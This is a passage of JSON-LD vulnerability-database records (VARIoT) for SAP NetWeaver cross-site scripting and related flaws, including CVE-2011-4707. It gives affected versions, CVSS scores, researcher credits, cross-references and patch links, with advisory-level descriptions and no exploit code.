"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201007-0623",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.4"
}
],
"sources": [
{
"db": "BID",
"id": "41913"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, Alexey Troshichev, Digital Security Research Group [DSecRG]",
"sources": [
{
"db": "BID",
"id": "41913"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The System Landscape Directory of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\nNetWeaver 6.4 through 7.02 are vulnerable.",
"sources": [
{
"db": "BID",
"id": "41913"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "41913",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "41913"
}
]
},
"id": "VAR-201007-0623",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4925504733333334
},
"last_update_date": "2022-05-17T01:46:48.351000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "http://help.sap.com/saphelp_nw04s/helpdata/en/31/f0ff69551e4f259fdad799a229363e/content.htm"
},
{
"trust": 0.3,
"url": "/archive/1/512585"
}
],
"sources": [
{
"db": "BID",
"id": "41913"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "41913"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-13T00:00:00",
"db": "BID",
"id": "41913"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-13T00:00:00",
"db": "BID",
"id": "41913"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "41913"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver System Landscape Directory Multiple Cross Site Scripting Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "41913"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "41913"
}
],
"trust": 0.3
}
}
var-201112-0297
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201112-0297",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 5.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.4,
"vendor": "sap",
"version": "7.01*"
},
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastuchin, Dmitriy Evdokimov, Alexandr Polyakov and Alexey Tyurin of Digital Security Research Group (DSecRG)",
"sources": [
{
"db": "BID",
"id": "50680"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4707",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2011-4707",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4707",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201112-122",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2011-4707",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user\u0027s browser when viewed maliciously. When using transaction \\\"sa38\\\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \\\"File Name\\\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \\\"\u003cSTRING\u003e\\\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4707"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
}
],
"trust": 7.02
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "50680",
"trust": 4.6
},
{
"db": "NVD",
"id": "CVE-2011-4707",
"trust": 4.2
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122",
"trust": 2.0
},
{
"db": "CNVD",
"id": "CNVD-2011-4916",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4915",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4914",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4917",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4913",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4912",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4911",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20111117 [DSECRG-11-036] SAP NETWAVER VIRUS SCAN INTERFACE - MULTIPLE XSS",
"trust": 0.6
},
{
"db": "IVD",
"id": "3B9467EC-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3D199B1E-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3E98D306-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "3A022216-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "40204C22-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "4119FC7C-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "4247BD6E-1F7F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2011-4707",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "VULMON",
"id": "CVE-2011-4707"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003325"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-122"
},
{
"db": "NVD",
"id": "CVE-2011-4707"
}
]
},
"id": "VAR-201112-0297",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
],
"trust": 6.093194613333333
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 5.6
}
],
"sources": [
{
"db": "IVD",
"id": "3b9467ec-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3d199b1e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3e98d306-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "3a022216-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "40204c22-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4119fc7c-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "4247bd6e-1f7f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
]
},
"last_update_date": "2024-07-23T22:41:20.004000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers - 1546307",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5913"
},
{
